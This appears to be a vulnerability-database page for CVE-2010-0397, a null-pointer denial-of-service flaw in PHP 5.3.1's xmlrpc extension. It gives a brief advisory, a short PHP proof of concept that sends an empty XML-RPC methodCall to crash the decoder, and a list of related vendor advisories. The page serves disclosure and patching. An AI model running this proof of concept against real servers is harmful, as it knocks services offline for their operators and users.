Lucene search
Auke van SlootenEDB-ID:33755HistoryMar 12, 2010 - 12:00 a.m.
PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities
2010-03-1200:00:00
Auke van Slooten
www.exploit-db.com
17
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/38708/info
PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests.
Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library.
PHP 5.3.1 is vulnerable; other versions may also be affected.
<?php
$req = '<?xml version="1.0"?>
<methodCall>
</methodCall>';
$result = xmlrpc_decode_request( $req, $frop );
?>Related
seebug
seebug
PHP xmlrpcζ©ε±η©ΊζιεΌη¨ζη»ζε‘ζΌζ΄
2010-03-19 00:00:00
nessus
nessus
Mandriva Linux Security Advisory : php (MDVSA-2010:068)
2010-03-29 00:00:00
openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0255-1)
2010-05-18 00:00:00
openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0255-2)
2010-05-18 00:00:00
prion
prion
Null pointer dereference
2010-03-16 19:30:00
cve
cve
CVE-2010-0397
2010-03-16 19:30:00
securityvulns
securityvulns
PHP DoS
2010-03-21 00:00:00
[SECURITY] [DSA-2018-1] New php5 packages fix null pointer dereference
2010-03-21 00:00:00
[USN-989-1] PHP vulnerabilities
2010-09-27 00:00:00
openvas
openvas
Mandriva Update for php MDVSA-2010:068 (php)
2010-03-31 00:00:00
Mandriva Update for drakconf MDVA-2010:068 (drakconf)
2010-02-19 00:00:00
Debian: Security Advisory (DSA-2018-1)
2023-03-08 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:53:57
ubuntucve
ubuntucve
CVE-2010-0397
2010-03-16 00:00:00
f5
f5
SOL12156 - PHP xmlrpc vulnerability - CVE-2010-0397
2010-10-14 00:00:00
K12156 : PHP xmlrpc vulnerability - CVE-2010-0397
2013-07-03 00:00:00
nvd
nvd
CVE-2010-0397
2010-03-16 19:30:00
cvelist
cvelist
CVE-2010-0397
2010-03-16 19:00:00
debian
debian
[SECURITY] [DSA-2018-1] New php5 packages fix null pointer dereference
2010-03-18 16:38:27
osv
osv
php5 - null pointer dereference
2010-03-18 00:00:00
fedora
fedora
[SECURITY] Fedora 12 Update: php-5.3.3-1.fc12
2010-08-23 22:08:06
[SECURITY] Fedora 13 Update: php-eaccelerator-0.9.6.1-2.fc13
2010-08-23 22:00:56
[SECURITY] Fedora 13 Update: maniadrive-1.2-22.fc13
2010-08-23 22:00:56
oraclelinux
oraclelinux
php security update
2010-11-29 00:00:00
centos
centos
php security update
2010-11-30 12:21:14
redhat
redhat
(RHSA-2010:0919) Moderate: php security update
2010-11-29 00:00:00
ubuntu
ubuntu
PHP vulnerabilities
2010-09-20 00:00:00